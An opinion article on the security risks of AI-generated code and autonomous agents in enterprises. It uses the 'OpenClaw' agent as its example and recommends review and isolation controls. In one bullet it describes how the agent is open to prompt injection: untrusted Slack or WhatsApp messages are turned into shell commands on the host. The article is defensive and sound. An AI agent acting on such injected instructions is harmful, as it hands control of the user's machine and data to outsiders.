By Lawrence Yandrofski | AI Financial Services, Executive Interim Manager X-PM Asia
Enterprises, including financial institutions, are seeing a rush to modernize their legacy systems, or to add new functions using Agentic AI.
While this creates speed, it is introducing a dangerous new operational habit, where developers are letting LLMs generate code based on high-level intent without doing the necessary engineering due diligence. While this improves velocity in the short term, it creates massive technical debt, as enterprises are effectively accumulating piles of autonomous code that can neither be explained nor secured.
Such AI-generated code cannot be treated as trusted software, but rather as untrusted input. If we don’t enforce these architectural standards now, we are handing the keys over to Shadow AI.
To see where this leads, look at the “OpenClaw” (Clawbot) incident. This is an open-source agent built almost entirely via AI prompts. It functions like a highly capable employee, but it completely lacks a security immune system.
Microsoft Security Research has been blunt about this, recommending do not run this on an enterprise workstation. Unlike standard software, agents produced by such tools hold persistent admin credentials and unrestricted internet access. They can change their own state and bypass the usual authentication steps.
OpenClaw exposes three security risks that are typical of this new wave of AI agent generators:
- It binds to all network interfaces (0.0.0.0) without default authentication, exposing internal tools to the public web.
- It is vulnerable to prompt injection, meaning it will translate untrusted messages from connected sources such as Slack or WhatsApp directly into shell commands on the host OS.
- It accepts unverified community plugins (“skills”) with full privileges, which is an open invitation for supply chain malware.
To stay compliant with frameworks like Singapore’s IMDA and CSA guidelines, enterprises need to move past the idea of “Active Liveness” and enforce a strict “Human-on-the-Loop” standard, including:
- Implement mandatory Senior Peer Review. The rule is simple: If the human reviewer cannot explain the logic behind the AI-generated code, it gets rejected. Treat it as technical debt.
- Autonomous runtimes do not belong on corporate laptops. All testing happens in isolated, non-persistent Virtual Machines (VMs) with segmented credentials.
- The CI/CD pipeline needs automated scanning to catch “hallucinated dependencies” before they are merged, to stop supply chain poisoning at the source.
Recent Comments